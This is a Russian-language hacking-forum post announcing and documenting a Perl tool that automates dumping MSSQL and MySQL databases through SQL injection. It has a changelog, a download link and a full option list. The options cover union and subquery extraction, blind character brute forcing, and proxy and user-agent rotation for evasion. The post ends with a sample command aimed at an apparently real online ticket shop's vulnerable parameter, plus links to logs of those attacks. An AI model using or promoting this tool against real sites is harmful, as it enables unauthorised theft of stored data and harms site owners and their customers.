Форум АНТИЧАТ - Показать сообщение отдельно

Antichat Databases_Dumper_MSSQL(MySQL-5.*) v.1.1.1
Скрипт для дампинга базы mssql, mysql-5.*

Основная функция:
- автоматический частичный\полный дампинг БД (mssql, mysql-5.*)

Скрипт предназначен для автоматического дампа БД, используя sql-инъекцию в запросе на основе системных таблиц "INFORMATION_SCHEMA".
Поддерживаются MSSQL и MySQL.v.5.*.

Когда мы стречаемся с sql-inj в MSSQL приходится искать нужные нам столбцы и таблицы, строить запрос. Хуже, если нужно сдампить всю базу, или просмотреть структуру, а результат каждого запроса - только ОДНА запись. Это самый тяжёлый и нудный случай, и скрипт сущесственно облегчает рутиную работу.

- ВНИМАНИЕ! Включени автодампа и произвольного запроса недопустимо!

- всего предусмотрено три алгоритма автодампа: только скелет таблиц, скелет таблиц и столбцов, полный дамп(данные).

- есть возможность задать произвольный запрос(-Z 1).
(внимание: -Z либо не задан, либо равен 1)
При произвольном запросе производится полный дамп данных. Если столбец не указан - дампится вся указанная таблица.
Условие WHERE при неуказанном столбце выполняет поиск желаемых столбцов. При указанном столбце WHERE производит поиск желаемых данных.

- вы можете при необходимости задать лимит, выбрать желаемый метод отрицания, указать тип шифрования.

Обращаю ваше внимание, что консольная и гуи одной версии практически аналогичны по фунциональности.

v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(19.10.2006) - новое: GUI-интерфейс!
- фикс: Win\Nix-совместимость
v1.0.9(19.10.2006) - новое: режим посимвольного брута. Специально для хакеров-камикадзе =)Пакуйте сухари, к Вам уже едут!!!
Автоопределение верного ответа, пресеты ascii.
Автоопределение длины записи не стал встраивать - имхо совсем не нужно оно тут. Это лишние запросы.
v1.0.8(18.10.2006) - новое: эвристическое определение необходимых параметров
Очень полезный модуль. Определяет тип БД, кол-во столбцов UNION, рабочий столбец и его атрибуты
v1.0.7(17.10.2006) - новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
v1.0.6(16.10.2006) - новое: добавил convert(mysql) для столбцов
v1.0.5(15.10.2006) - новое: добавил AES_ENCRYPT шифрование столбцов
v1.0.4(14.10.2006) - мелкая оптимизация, правка багов, автоматизация
v1.0.3(12.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
v1.0.2(11.10.2006) - новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
v1.0.1(10.10.2006) - новое: защита от дурака + хелп
v1.0.0(24.08.2006) - надоело. НАДОЕЛО! это пиздец какой-то дампить бд вручную
- новое: дамп БД: только структура таблиц, структура таблиц и столбцов
- новое: полный дамп БД в указанным вами запросе
- новое: поддержка mysql,mssql и характерного для них синтаксиса
- новое: два вида отрицания: "NOT IN" и "<>"
- новое: шифрование переменных в hex и char
- новое: работа пост или гет запросом
- новое: поддержка прокси
- новое: логирование в файл

Скачать: http://sec-123.narod.ru/public/sql_dump_public.rar

Выдержка из хелпа:

Код:

   Options:  *-необходимый параметр
*-u - путь к сайту с уязвимым скриптом "http://site.com/?bag=-1'"
 -W - юзаем юнион(-W=0) или подзапрос(-W=1)
 -A - алгоритм без доп.условия where:
   "1" - сдампить только названия таблиц без столбцов и данных
   "2" - сдампить только названия таблиц и столбцов без данных
   "3" - полный дамп базы.
 -Z - выдрать данные из конкретной таблицы,столбца. Дампит полностью, игнорируя -A
   -t - выдрать только из указанной таблицы
   -с - выдрать только из указанного столбца таблицы
   -w - доп.условие where
 -E - эвристическое определение всех ниже лежащих подпараметров. 
   -M - 0="MSSQL"(default); 1="MySQL"
   -C - вид комента. 0="/*",1="--",2="#"
   -O - all column in SELECT (default=1)
   -o - work column in SELECT (default=1)
   -s - строка\символы до полезного параметра
   -S - строка\символы после полезного параметра
   -m - TOP(mssql) или LIMIT(mysql-5.*)
     -n - параметр TOP или первый параметр LIMIT
     -N - второй параметр LIMIT. при отсутствии равен n
   -z - конвертирование cp1251 или latin1
   -a - шифрование имён столбцов в AES_ENCRYPT(AES_DECRYPT(TABLE_NAME,0x71,0x71))
 -B - режим посимвольного брута.( Элект, ТЫ ПСИХ!! )
   -s - строка в правильном запросе(AND 1=1)
   -i - пресеты ascii-перебора. По дефолту - все символы
   -L - по умолчанию выход при первой ошибке, что при юзании всех ascii означает конец строки
     -v - с какой позиции начать перебор неизвестной(по дефолту с первой)
     -V - на какой позиции закончить(по дефолту на 10-й)
 -f - задаёт отрицание: 'NOT IN' либо '<>'
 -h - шифрование переменных в HEX, CHAR
 -r - вид пробела. SPACE(%20)=0(def);'+'=1;%2B=2;/**/=3;TAB(%09)=4;%0D=5;\$IFS=6
 -g - работа через гет или пост-запросы
 -T - время задержки. 'RAND'-рэндомное от 1 до 10 сек
 -b - файл со списком юзер-агентов. рэндомный выбор
 -p - файл с проксями. рэндомный выбор
 -l - логирование в указанный файл

Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! В GUI версии используется кодировка "use encoding 'cp1251';". Она была подключена ради поддержки русского gui-хелпа.
При использовании посимвольного брута Вы можете иметь проблемы с неподбираемыми русскими буквами, поскольку ascii-коды в скрипте будут в cp1251, а на сервере в utf-8.
Для устранения глюка просто закоментруйте подключенную кодировку: "# use encoding 'cp1251';"

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Внимание! Выяснена особенность перла, имеющая неприятные последствия.
При глубине вложения процедур более одной, вывод текста в консоль происходит, если выполняется хотя бы одно условие:
- выход из процедуры в тело самой первой процедуры или основной программы;
- использование при выводе символа переноса строки: "\n"
Поскольку структура моих скриптов имеет высокую степень вложений при выполнении, и иногда требуется не выполнять перенос строки, то вывод данных в консоль может быть задержан.
В любом случае в лог-файл данные попадают БЕЗ задержек, поэтому даже если вы кикнули якобы подвисший скрипт - проверьте лог-файл.
Как пример - вывод данных из столбца осуществляется в строку без "\n" и пока не будут найдены все данные в столбце - они не отобразяться в консоли, но прологируться.

Протестить на сайте:

Код:

C:\>C:\mssql_base_dump.pl -u "http://www.onlineticketshop.nl/content/details.asp?sub_id=556&taal_id=(" -W 1

Лог работы:
Они слишком большие. Прилагаются в аттаче.
http://sec-123.narod.ru/public/basedump_onlyt.txt
http://sec-123.narod.ru/public/basedump_query.txt
http://sec-123.narod.ru/public/basedump_ocb.txt